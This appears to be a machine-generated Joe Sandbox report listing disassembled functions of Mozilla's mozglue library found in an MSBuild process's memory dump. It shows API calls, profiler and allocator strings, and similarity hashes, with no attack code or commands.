                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: __aulldiv.LIBCMT ref: 6C8A5DB4
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8A5DED
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C8CF155
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF1E0
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF1ED
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF212
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF229
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF231
                                                                                                                                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C8CF248
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF2AE
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF2BB
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF2F8
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF350
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF35D
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF381
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF398
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF3A0
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF489
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF491
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C8CF3CF
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: GetCurrentThreadId.KERNEL32 ref: 6C8CF440
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF44D
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF472
                                                                                                                                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C8CF4A8
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF559
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF561
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF577
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF585
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF5A3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_pause_sampling, xrefs: 6C8CF3A8
                                                                                                                                                                                                                      • [I %d/%d] profiler_resume_sampling, xrefs: 6C8CF499
                                                                                                                                                                                                                      • [I %d/%d] profiler_resume, xrefs: 6C8CF239
                                                                                                                                                                                                                      • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C8CF56A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                      • API String ID: 565197838-2840072211
                                                                                                                                                                                                                      • Opcode ID: def4d28803ee1d937d9829293d8c1c5ae1fe704eb251b5877a4e5d70695a590c
                                                                                                                                                                                                                      • Instruction ID: 5f89858f08590f6f0dc2ec3f5898a10db0b282ab63d424524f5abea5c02da077
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: def4d28803ee1d937d9829293d8c1c5ae1fe704eb251b5877a4e5d70695a590c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7D1F931708204DFDB109F68D5487AA77B9EB8632CF20096EED6953B81DB70D908C7A6
                                                                                                                                                                                                                      Function 6C8964C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C8964DF
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C8964F2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C896505
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C896518
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C89652B
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C89671C
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C896724
                                                                                                                                                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C89672F
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C896759
                                                                                                                                                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C896764
                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C896A80
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C896ABE
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C896AD3
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C896AE8
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C896AF7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                      • API String ID: 487479824-2878602165
                                                                                                                                                                                                                      • Opcode ID: 05f950a27af3c4e9cfe785461787de62ab044a512672f73fcac441c5c5b56e66
                                                                                                                                                                                                                      • Instruction ID: b4a7bcfe14cccdf038dfe5882d291302e4d42471fbd0a67a0ef5170905326ef5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05f950a27af3c4e9cfe785461787de62ab044a512672f73fcac441c5c5b56e66
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93F1E370A052199FDB70CF28CE48B9AB7B5AF46318F1446EDD819A3641D731AE84CFD0
                                                                                                                                                                                                                      Function 6C8C7E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpystrlen
                                                                                                                                                                                                                      • String ID: (pre-xul)$data$name$schema
                                                                                                                                                                                                                      • API String ID: 3412268980-999448898
                                                                                                                                                                                                                      • Opcode ID: aa3813788a06b431c0b51797007244a88f7ed63929ded60fe89e96e87e01d2d6
                                                                                                                                                                                                                      • Instruction ID: a067ea94f3369624277fa748c408970b32463977c36eb17f04d5698bead89d5d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa3813788a06b431c0b51797007244a88f7ed63929ded60fe89e96e87e01d2d6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26E16F71B043408BC720CF68894065BFBE9BBC5718F158E2DE899DB790DBB0DD498B92
                                                                                                                                                                                                                      Function 6C8AD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD4F2
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD50B
                                                                                                                                                                                                                        • Part of subcall function 6C88CFE0: EnterCriticalSection.KERNEL32(6C90E784), ref: 6C88CFF6
                                                                                                                                                                                                                        • Part of subcall function 6C88CFE0: LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C88D026
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD52E
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC), ref: 6C8AD690
                                                                                                                                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8AD6A6
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7DC), ref: 6C8AD712
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD751
                                                                                                                                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8AD7EA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                      • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                      • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                      • Opcode ID: 8a397a680f312665057052824e87b685a214749d08e6a111b4d3b4dd5118c158
                                                                                                                                                                                                                      • Instruction ID: 45f460fe9d538380ed83679beda54f3145cd1c69d3605041cab7aeb98dbd2179
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a397a680f312665057052824e87b685a214749d08e6a111b4d3b4dd5118c158
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13919371B087058FD728CF68C69066AB7F1EB89714F244D2ED99AC7A91D730E845CB81
                                                                                                                                                                                                                      Function 6C8E4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 6C8E4EFF
                                                                                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8E4F2E
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE ref: 6C8E4F52
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000), ref: 6C8E4F62
                                                                                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8E52B2
                                                                                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8E52E6
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000010), ref: 6C8E5481
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8E5498
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                      • API String ID: 4104871533-3887548279
                                                                                                                                                                                                                      • Opcode ID: 8ebf241cc493cca2b0cb7e13cf1c5f843e7d39683e40645f69b21bc4a4e18f55
                                                                                                                                                                                                                      • Instruction ID: 549bce30411b7791da737eb49599ee8fa8e7bb908bd255f6153032b08d6f5141
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ebf241cc493cca2b0cb7e13cf1c5f843e7d39683e40645f69b21bc4a4e18f55
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58F1A171A18B418FC726CF39885062BB7F5AFD6388F058B2EF856A7651DB31D442CB81
                                                                                                                                                                                                                      Function 6C897810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E744), ref: 6C897885
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E744), ref: 6C8978A5
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C8978AD
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C8978CD
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC), ref: 6C8978D4
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C8978E9
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C89795D
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C8979BB
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C897BBC
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C897C82
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7DC), ref: 6C897CD2
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C897DAF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 759993129-0
                                                                                                                                                                                                                      • Opcode ID: 380cc3dfcf793c56bdc2be36528ce9aa628f855429f11f0dc0d9f16cb7da7572
                                                                                                                                                                                                                      • Instruction ID: 622502c135d052e98cbfb629c5ba77214378c4dcd18ddc566db13c89845e11fe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 380cc3dfcf793c56bdc2be36528ce9aa628f855429f11f0dc0d9f16cb7da7572
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2027371A0521A8FDB64CF19C984799B7B5FF88318F2586AAD809A7711D730FE90CF80
                                                                                                                                                                                                                      Function 6C8C5190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C8C51DF
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C8C529C
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C8C52FF
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C8C536D
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C8C53F7
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C8C56C3
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8C56E0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C8C56BE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                                                                                                                                                                                      • String ID: MOZ_PROFILER_RECORD_OVERHEADS
                                                                                                                                                                                                                      • API String ID: 1227157289-345010206
                                                                                                                                                                                                                      • Opcode ID: 00be8f4dda72950ef29d38d3a6f0fd98096361caa8a53b8c1ad4dc18a7104b28
                                                                                                                                                                                                                      • Instruction ID: 8c4fdbacbc1ad1ff07965dea202a74491faf4a74fcb5b4205eeafa8fcae13e39
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00be8f4dda72950ef29d38d3a6f0fd98096361caa8a53b8c1ad4dc18a7104b28
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64E17171A14F45CAC722CF38C850267B7B9BF9B394F109F1EE8AA2A950DF70D4469742
                                                                                                                                                                                                                      Function 6C8E7030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C8E7046
                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C8E7060
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C8E707E
                                                                                                                                                                                                                        • Part of subcall function 6C8981B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C8981DE
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C8E7096
                                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C8E709C
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 6C8E70AA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                                                                                                                                                      • String ID: ### ERROR: %s: %s$(null)
                                                                                                                                                                                                                      • API String ID: 2989430195-1695379354
                                                                                                                                                                                                                      • Opcode ID: 7a5d5c4d5f2080542abf9f5c56f45316f103d136c8d89d1227772a40e47f5bf1
                                                                                                                                                                                                                      • Instruction ID: 99ca5afdd17908c3580c285c2073ccda6bc9d7311015ee2850beac3d38905ee3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a5d5c4d5f2080542abf9f5c56f45316f103d136c8d89d1227772a40e47f5bf1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA01B9B1B04108AFDB006BA8DC4ADAF7BBCEF49255F11043DFA05E3241D771A9148BE1
                                                                                                                                                                                                                      Function 6C8D2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C8D2C31
                                                                                                                                                                                                                      • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C8D2C61
                                                                                                                                                                                                                        • Part of subcall function 6C884DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C884E5A
                                                                                                                                                                                                                        • Part of subcall function 6C884DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C884E97
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8D2C82
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C8D2E2D
                                                                                                                                                                                                                        • Part of subcall function 6C8981B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C8981DE
